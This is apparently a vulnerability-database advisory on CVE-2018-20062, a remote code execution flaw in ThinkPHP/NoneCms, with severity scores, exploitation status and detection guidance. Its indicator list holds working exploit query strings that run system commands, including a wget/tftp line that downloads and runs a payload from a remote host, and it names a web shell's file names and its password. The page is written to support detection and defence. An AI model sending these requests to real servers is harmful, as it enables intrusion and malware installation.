cbcvebase.
CVE-2018-20062
published 2018-12-11

CVE-2018-20062: An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.53%
99.9th percentile
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.

Affected

1 ranges
VendorProductVersion rangeFixed in
5nonenonecms

Detection & IOCsextracted from sources · hover to see the quote

urls=index/\think\Request/input&filter=phpinfo&data=1
url/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
url/index.php?s=captcha
url/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J
filenamepublic.txt
filenameroeter.php
hash49495c9aa08d7859fec1f99f487560b59d8a8914811746181e4e7edbee85341f
hashd068e8f781879774f0bcc1f2a116211d41194b67024fe45966c8272a8038a7a1
hash1583fd1c6607b77f51411c4ad7c9225324fd1b069645062a348cd885de0ac382
hash7e20c6cea88ade6a6c4a08ce48fe4ac2451069b7662a8dda4362a304b4854ec7
hash0b05202f4da9bbe1af1811707a76544453282c4f3c0ac9b353759c86742f4369
hash73df4e952c581afc427fa18fa2d0bcfa409c1814cd872a3ccf05d44f934ce780
hashc082c39e595c7f23c04ce0d6597657d6e649585d5da49b5bd896e664b712e60d
hash500dd4c1a5c24495c3bb8173ce5c7b15ba3344aef855090b9b9585b2bfeea974
command_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
port8080
bytes
XOR key 0x87, cumulative byte-wise XOR string encryption
  • Detect exploit attempts by looking for HTTP requests to /index.php containing the 's' parameter with '\think\app/invokefunction' or '\think\Request/input' combined with 'filter' and 'call_user_func_array' in the query string.
  • Alert on HTTP responses from ThinkPHP servers that include a 404 status code with a body matching 'copyright.*ThinkPHP', which indicates a vulnerable unpatched instance fingerprinted by attackers.
  • Monitor web server directories for creation of files named 'roeter.php' or downloads of 'public.txt', which are indicators of Dama web shell deployment following exploitation.
  • The Dama web shell uses the password 'admin' for authentication; monitor for POST requests to 'roeter.php' with this credential as a detection signal.
  • Track the AutoFocus tag 'HideNSeek' to identify related malware samples leveraging this ThinkPHP exploit.
  • ·The Metasploit module defaults to port 8080 for ThinkPHP targets, but real-world deployments may run on port 80 or 443; adjust RPORT accordingly.
  • ·The module automatically attempts to detect the ThinkPHP version and selects between two distinct exploit paths (invokefunction GET for <=5.0.22, captcha POST for 5.0.23); both paths must be covered in detection rules.
  • ·Payload delivery servers in the Dama web shell campaign are themselves compromised ThinkPHP hosts (located in Hong Kong), so blocking those IPs may be insufficient as infrastructure rotates through victim nodes.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.